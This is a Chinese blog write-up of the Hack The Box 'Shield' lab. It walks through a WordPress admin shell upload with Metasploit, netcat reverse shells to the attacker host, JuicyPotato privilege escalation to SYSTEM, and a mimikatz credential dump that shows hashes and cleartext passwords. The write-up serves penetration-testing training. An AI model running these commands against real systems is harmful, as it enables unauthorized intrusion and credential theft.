HTB-Shield
正文
普普通通的端口,直接访问试试,就一个window server的初试界面,没啥思路,直接上工具
lao@laolao:~/桌面$ sudo nmap -sS -Pn -A 10.10.10.29 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-12 22:40 CST Nmap scan report for localhost (10.10.10.29) Host is up (0.22s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server 3306/tcp open mysql MySQL (unauthorized) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016|2012|10 (91%) OS CPE: cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_10:1607 Aggressive OS guesses: Microsoft Windows Server 2016 (91%), Microsoft Windows Server 2012 (85%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows 10 1607 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 225.37 ms localhost (10.10.14.1) 2 225.39 ms localhost (10.10.10.29) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 34.56 seconds lao@laolao:~/桌面$
dirsearch出来了wordpress界面,有一个登录入口,sqlmap跑一下出不来结果,啊,怎么办,好烦。查了WP才知道密码:admin:P@s5w0rd!,上一题出来的,吐血😒
lao@laolao:~/桌面$ dirsearch -u http://10.10.10.29/ _|. _ _ _ _ _ _|_ v0.4.1 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10877 Output File: /home/lao/.dirsearch/reports/10.10.10.29/_21-08-12_22-48-51.txt Error Log: /home/lao/.dirsearch/logs/errors-21-08-12_22-48-51.log Target: http://10.10.10.29/ [22:48:51] Starting: [22:48:53] 403 - 312B - /%2e%2e//google.com [22:49:09] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd [22:49:10] 301 - 0B - /Wordpress/ -> http://10.10.10.29/wordpress/ [22:50:05] 200 - 3KB - /wordpress/wp-login.php [22:50:05] 200 - 24KB - /wordpress/ Task Completed lao@laolao:~/桌面$
msf中搜了一些wordpress的利用模块,在:https://www.rapid7.com/db/中搜索了一下,记录了几个,本来想全部标记完,算了吧,大部分是插件和主题的漏洞
Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/freebsd/local/rtld_execl_priv_esc 2009-11-30 excellent Yes FreeBSD rtld execl() Privilege Escalation 1 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution 2 exploit/windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability 3 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution 4 exploit/multi/http/wp_db_backup_rce 2019-04-24 excellent Yes WP Database Backup RCE #WP-DB-BackupWordPress数据库备份插件 5 exploit/windows/fileformat/winrar_name_spoofing 2009-09-28 excellent No WinRAR Filename Spoofing 6 exploit/multi/http/wp_ait_csv_rce 2020-11-14 excellent Yes WordPress AIT CSV Import Export Unauthenticated Remote Code Execution #AIT CSV导入/导出插件:允许未经身份验证的远程攻击者上传和执行任意 PHP 代码,上传处理程序不需要身份验证,也不验证上传的内容,文件上传到 wp-content/uploads/。 7 exploit/unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload #此模块将生成一个插件,将有效负载打包到其中并将其上传到运行 WordPress 的服务器,并提供有效的管理员凭据。 8 exploit/unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability #Asset-Manager <= 2.0 插件:通过滥用upload.php文件,恶意用户可以在未经认证的情况下将文件上传到临时目录,从而导致任意代码执行。 9 exploit/multi/http/wp_crop_rce 2019-02-19 excellent Yes WordPress Crop-image Shell Upload #此模块利用WordPress版本5.0.0和<=4.9.8上的路径遍历和本地文件包含漏洞。crop image(裁剪图像)功能允许至少具有作者权限的用户通过在上载期间更改_wp_附加的_文件引用来调整图像大小并执行路径遍历。 10 exploit/unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload #该模块利用了upload_file.php 脚本中所有版本的Holding Pattern 主题中的文件上传漏洞,该脚本不包含会话或文件验证。 它允许未经身份验证的用户上传任何类型的文件,然后在 Web 服务器的上下文中执行 PHP 脚本。 11 exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload 2016-05-04 excellent Yes WordPress Ninja Forms Unauthenticated File Upload #Ninja Forms 插件的 2.9.36 到 2.9.42 版本包含一个未经身份验证的文件上传漏洞,允许来宾上传可以在 Web 服务器上下文中执行的任意 PHP 代码。 12 exploit/unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability #该模块利用了在 WordPress 主题 OptimizePress 中发现的漏洞。 该漏洞是由于 media-upload.php 组件上的文件上传不安全,允许攻击者上传任意 PHP 代码。 此模块已在 OptimizePress 1.45 上成功测试。 13 exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload #用于 WordPress 的照片库插件包含允许远程攻击者执行任意 PHP 代码的缺陷。 存在此缺陷是因为 photo-gallery\photo-gallery.php 脚本允许访问 filemanager\UploadHandler.php。 UploadHandler.php 中的 post() 方法未正确验证或清理用户上传的文件。 此模块已在 1.2.5 版上测试。 14 exploit/unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload #该模块利用了 WordPress 插件 Pixabay Images 2.3.6 中的多个漏洞。 该插件不会检查提供的下载 URL 的主机,该 URL 可用于在系统上存储和执行恶意 PHP 代码。 15 exploit/unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability # WordPress 主题“platform”包含一个通过未经检查的 admin_init 调用远程执行代码的漏洞。 该主题使用 php 的包含功能从其临时文件名中包含上传的文件。 16 exploit/unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion #该模块利用了 WordPress 博客软件插件中的远程文件包含缺陷,称为高级自定义字段。 该漏洞允许通过 export.php 脚本远程包含文件和远程执行代码。 Advanced Custom Fields 插件版本 3.5.1 及以下版本易受攻击。 此漏洞仅在 php 选项 allow_url_include 设置为 On(默认关闭)时有效。 17 exploit/unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution #该模块利用名为 Foxypress 的 WordPress 博客软件插件中的任意 PHP 代码执行缺陷。 该漏洞允许通过uploadify.php 脚本进行任意文件上传和远程代码执行。 Foxypress 插件版本 0.4.1.1 到 0.4.2.1 容易受到攻击。 18 exploit/multi/http/wp_responsive_thumbnail_slider_upload 2015-08-28 excellent Yes WordPress Responsive Thumbnail Slider Arbitrary File Upload 19 exploit/unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability 20 exploit/unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution 21 exploit/unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload 22 exploit/unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload 23 exploit/unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload 24 exploit/unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability 25 exploit/unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload 26 exploit/unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability 27 exploit/unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution 28 exploit/unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes Wordpress Ajax Load More PHP Upload Vulnerability 29 exploit/unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes Wordpress Creative Contact Form Upload Vulnerability 30 exploit/unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes Wordpress Download Manager (download-manager) Unauthenticated File Upload 31 exploit/multi/http/wp_dnd_mul_file_rce 2020-05-11 excellent Yes Wordpress Drag and Drop Multi File Uploader RCE 32 exploit/unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes Wordpress Front-end Editor File Upload 33 exploit/unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability 34 exploit/unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes Wordpress InfusionSoft Upload Vulnerability 35 exploit/unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload 36 exploit/unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes Wordpress N-Media Website Contact Form Upload Vulnerability 37 exploit/unix/webapp/wp_plainview_activity_monitor_rce 2018-08-26 excellent Yes Wordpress Plainview Activity Monitor RCE 38 exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability 39 exploit/unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload 40 exploit/unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes Wordpress Work The Flow Upload Vulnerability 41 exploit/unix/webapp/jquery_file_upload 2018-10-09 excellent Yes blueimp's jQuery (Arbitrary) File Upload Interact with a module by name or index. For example info 41, use 41 or use exploit/unix/webapp/jquery_file_upload msf6 >
payload大成功了,nice~,但是这个终端老是断开,执行shell也没用
msf6 > use exploit/unix/webapp/wp_admin_shell_upload [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options Module options (exploit/unix/webapp/wp_admin_shell_upload): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD yes The WordPress password to authenticate with Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path to the wordpress application USERNAME yes The WordPress username to authenticate with VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.102 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 WordPress msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd! PASSWORD => P@s5w0rd! msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 10.10.10.29 RHOSTS => 10.10.10.29 msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin USERNAME => admin msf6 exploit(unix/webapp/wp_admin_shell_upload) > set Lhost 10.10.14.115 Lhost => 10.10.14.115 msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress/ TARGETURI => /wordpress/ msf6 exploit(unix/webapp/wp_admin_shell_upload) > exploit [*] Started reverse TCP handler on 10.10.14.115:4444 [*] Authenticating with WordPress using admin:P@s5w0rd!... [+] Authenticated with WordPress [*] Preparing payload... [*] Uploading payload... [*] Executing the payload at /wordpress/wp-content/plugins/HrVHXHQuCk/PquYexuTsY.php... [*] Sending stage (39282 bytes) to 10.10.10.29 [+] Deleted PquYexuTsY.php [+] Deleted HrVHXHQuCk.php [*] Meterpreter session 1 opened (10.10.14.115:4444 -> 10.10.10.29:50240) at 2021-08-13 16:37:17 +0800 [!] This exploit may require manual cleanup of '../HrVHXHQuCk' on the target meterpreter >
找的一种方法是使用nc发到对面去建立一个反弹shell(又是老套路),用find找一下kali里面的nc保存路径,把它复制一份到桌面(我的msf在桌面打开的)
lao@laolao:~/桌面$ sudo find / -name "nc.exe" lao@laolao:~/桌面$ cp /usr/share/windows-resources/binaries/nc.exe .
msf上传上去执行一下execute -f nc.exe -a "-e cmd.exe 10.10.14.115 5555"(nc先监听5555)。execute,执行命令,-f 后面跟需要执行的命令,-a 传递给命令的参数。解释一下就是执行nc -e cmd.exe 10.10.14.115 5555,把本机的shell反弹给kali
meterpreter > cd ../../ meterpreter > ls Listing: C:\inetpub\wwwroot\wordpress\wp-content ================================================ Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 28 fil 2019-05-30 17:55:42 +0800 index.php 40777/rwxrwxrwx 4096 dir 2021-08-14 03:10:06 +0800 plugins 40777/rwxrwxrwx 4096 dir 2020-02-12 02:23:34 +0800 themes 40777/rwxrwxrwx 0 dir 2021-08-14 03:10:06 +0800 upgrade 40777/rwxrwxrwx 4096 dir 2021-08-14 03:10:06 +0800 uploads meterpreter > cd uploads meterpreter > upload nc.exe [*] uploading : /home/lao/桌面/nc.exe -> nc.exe [*] Uploaded -1.00 B of 58.00 KiB (-0.0%): /home/lao/桌面/nc.exe -> nc.exe [*] uploaded : /home/lao/桌面/nc.exe -> nc.exe meterpreter > execute -f nc.exe -a "-e cmd.exe 10.10.14.115 5555" Process 2996 created.
然后msf上传烂土豆(是一款Windows的本地提权工具,利用了COM对象进行提权,相比RottenPotatoNG适用范围更加广泛),使用前先看一下权限,这里有的是SeImpersonate权限
C:\inetpub\wwwroot\wordpress\wp-content\uploads>whoami /priv whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled C:\inetpub\wwwroot\wordpress\wp-content\uploads>
nc写一个shell.bat脚本,内容是把powershell反弹给kali5555
lao@laolao:~/桌面$ nc -lnvp 5555 listening on [any] 5555 ... connect to [10.10.14.115] from (UNKNOWN) [10.10.10.29] 58630 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot\wordpress\wp-content\uploads>echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.115 1111 > shell.bat
nc监听1111,上面的5555的nc中执行一下烂土豆
命令解析:
- -t createprocess调用: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both ,
- 如果开启SeImpersonate权限,使用
-t t - 如果开启SeAssignPrimaryToken权限,用
-t u - 如果均开启,可以选择
-t * - 如果均未开启,那么无法提权
- 如果开启SeImpersonate权限,使用
- -p <program>: 运行指定程序
- -l <port>: COM服务器侦听端口
- -m <ip>: COM服务器侦听地址 (默认 127.0.0.1)
- -a <argument>: 传递给程序命令行参数 (默认 NULL)
- -k <ip>: RPC服务器IP地址 (默认 127.0.0.1)
- -n <port>: RPC服务器侦听端口 (默认 135)
- -c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097}) https://github.com/ohpe/juicy-potato/tree/master/CLSID
- -z 仅测试CLSID并打印令牌的用户
C:\inetpub\wwwroot\wordpress\wp-content\uploads>JuicyPotato.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 JuicyPotato.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337 Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337 ...... [+] authresult 0 {4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK C:\inetpub\wwwroot\wordpress\wp-content\uploads>
1111的nc会获得一个system权限的powershell
lao@laolao:~/桌面$ nc -lvnp 1111 listening on [any] 1111 ... connect to [10.10.14.115] from (UNKNOWN) [10.10.10.29] 58695 Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Windows\system32> echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.115 1111 > shell.bat Write-Output : Parameter cannot be processed because the parameter name 'e' is ambiguous. Possible matches include: -ErrorAction -ErrorVariable. At line:1 char:67 + ... ART C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powersh ... + ~~ + CategoryInfo : InvalidArgument: (:) [Write-Output], ParameterBi ndingException + FullyQualifiedErrorId : AmbiguousParameter,Microsoft.PowerShell.Commands .WriteOutputCommand PS C:\Windows\system32> cd c:\users\administrator\desktop cd c:\users\administrator\desktop PS C:\users\administrator\desktop> dir dir Directory: C:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 2/25/2020 1:28 PM 32 root.txt PS C:\users\administrator\desktop> type root.txt type root.txt 6e9a9fdc6f64e410a68b847bb4b404fa PS C:\users\administrator\desktop>
虽然到这里已经可以结束了,但是按照老套路还要进一步为下一个靶场做铺垫,上猕猴桃拿域控,可以得到一个账户:sandra,Password1234!
PS C:\inetpub\wwwroot\wordpress\wp-content\uploads> .\mimikatz_64.exe .\mimikatz_64.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 1830598 (00000000:001beec6) Session : Service from 0 User Name : DefaultAppPool Domain : IIS APPPOOL Logon Server : (null) Logon Time : 8/13/2021 10:51:22 AM SID : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&ssp : credman : Authentication Id : 0 ; 307425 (00000000:0004b0e1) Session : Interactive from 1 User Name : sandra Domain : MEGACORP Logon Server : PATHFINDER Logon Time : 8/13/2021 10:35:36 AM SID : S-1-5-21-1035856440-4137329016-3276773158-1105 msv : [00000003] Primary * Username : sandra * Domain : MEGACORP * NTLM : 29ab86c5c4d2aab957763e5c1720486d * SHA1 : 8bd0ccc2a23892a74dfbbbb57f0faa9721562a38 * DPAPI : f4c73b3f07c4f309ebf086644254bcbc tspkg : wdigest : * Username : sandra * Domain : MEGACORP * Password : (null) kerberos : * Username : sandra * Domain : MEGACORP.LOCAL * Password : Password1234! ssp : credman : Authentication Id : 0 ; 167782 (00000000:00028f66) Session : Service from 0 User Name : wordpress Domain : IIS APPPOOL Logon Server : (null) Logon Time : 8/13/2021 10:34:37 AM SID : S-1-5-82-698136220-2753279940-1413493927-70316276-1736946139 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&ssp : credman : Authentication Id : 0 ; 66529 (00000000:000103e1) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 8/13/2021 10:34:19 AM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&ssp : credman : Authentication Id : 0 ; 66296 (00000000:000102f8) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 8/13/2021 10:34:19 AM SID : S-1-5-90-0-1 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : SHIELD$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : SHIELD$ Domain : MEGACORP Logon Server : (null) Logon Time : 8/13/2021 10:34:18 AM SID : S-1-5-20 msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : shield$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&ssp : credman : Authentication Id : 0 ; 995 (00000000:000003e3) Session : Service from 0 User Name : IUSR Domain : NT AUTHORITY Logon Server : (null) Logon Time : 8/13/2021 10:34:23 AM SID : S-1-5-17 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 8/13/2021 10:34:19 AM SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 36412 (00000000:00008e3c) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 8/13/2021 10:34:18 AM SID : msv : [00000003] Primary * Username : SHIELD$ * Domain : MEGACORP * NTLM : 9d4feee71a4f411bf92a86b523d64437 * SHA1 : 0ee4dc73f1c40da71a60894eff504cc732de82da tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : SHIELD$ Domain : MEGACORP Logon Server : (null) Logon Time : 8/13/2021 10:34:18 AM SID : S-1-5-18 msv : tspkg : wdigest : * Username : SHIELD$ * Domain : MEGACORP * Password : (null) kerberos : * Username : shield$ * Domain : MEGACORP.LOCAL * Password : cw)_#JH _gA:]UqNu4XiN`yA'9Z'OuYCxXl]30fY1PaK,AL#ndtjq?]h_8<Kx'\*9e<s`ZV uNjoe Q%\_mX<Eo%lB:NM6@-a+qJt_l887Ew&m_ewr??#VE&ssp : credman : mimikatz #
参考
- https://blog.csdn.net/m0_48066270/article/details/108811178
- https://blog.csdn.net/weixin_45663905/article/details/108013149
- https://blog.csdn.net/qq_26091745/article/details/105091686
- http://emonsec.com/web/590.html
